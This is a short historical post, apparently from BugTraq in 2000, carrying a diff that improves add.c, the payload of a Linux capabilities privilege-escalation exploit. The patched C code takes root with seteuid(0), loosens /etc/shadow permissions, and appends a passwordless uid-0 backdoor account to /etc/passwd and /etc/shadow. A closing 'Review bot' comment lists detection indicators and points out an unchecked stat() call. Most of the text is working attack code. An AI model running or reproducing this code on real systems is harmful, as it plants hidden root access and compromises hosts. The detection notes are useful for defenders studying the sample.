Linux Capabilities Vulnerability
This patch (for the component add.c included in "linux-cap-exp.txt") was posted to BugTraq on June 8, 2000 by "Mark K. Pettit" <pettit@yahoo-inc.com> and fixes a couple of minor problems with that exploit. It fixes a missing \n and makes the exploit work on systems with the shadow file set to mode 400.
--- add.c.orig Thu Jun 8 11:32:33 2000
+++ add.c Thu Jun 8 11:21:15 2000
@@ -1,17 +1,24 @@
 #include <fcntl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <unistd.h>
 int main (void) {
 int fd;
 char string[40];
+ struct stat buf;
 seteuid(0);
 fd = open("/etc/passwd", O_APPEND|O_WRONLY);
 strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
 write(fd, string, strlen(string));
 close(fd);
+ stat("/etc/shadow", &buf);
+ chmod("/etc/shadow", S_IRUSR|S_IWUSR);
 fd = open("/etc/shadow", O_APPEND|O_WRONLY);
- strcpy(string, "yomama::11029:0:99999:7:::");
+ strcpy(string, "yomama::11029:0:99999:7:::\n");
 write(fd, string, strlen(string));
 close(fd);
-
+ chmod("/etc/shadow", buf.st_mode);
 }
|
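Review bot: Nothing in add.c documents what the patched program leaves behind on the host, and after this hunk that includes two mode changes on /etc/shadow on top of the entries appended to both files. A header comment such as `/* Appends a uid-0 account with an empty password field to /etc/passwd and /etc/shadow; /etc/shadow is set to 0600 for the write and then set back to the mode saved by stat(). */` would make those artifacts explicit for anyone analysing the sample. For defenders that same list is the detection surface: file-integrity or audit watches on the two files would record the appends and the chmod pair, and a uid-0 line with an empty password field is the persistent indicator. The return value of the added `stat()` is not checked, so the mode written back by the last `chmod()` is not guaranteed to be the file's original mode; treat the permissions of /etc/shadow as suspect when triaging an affected host.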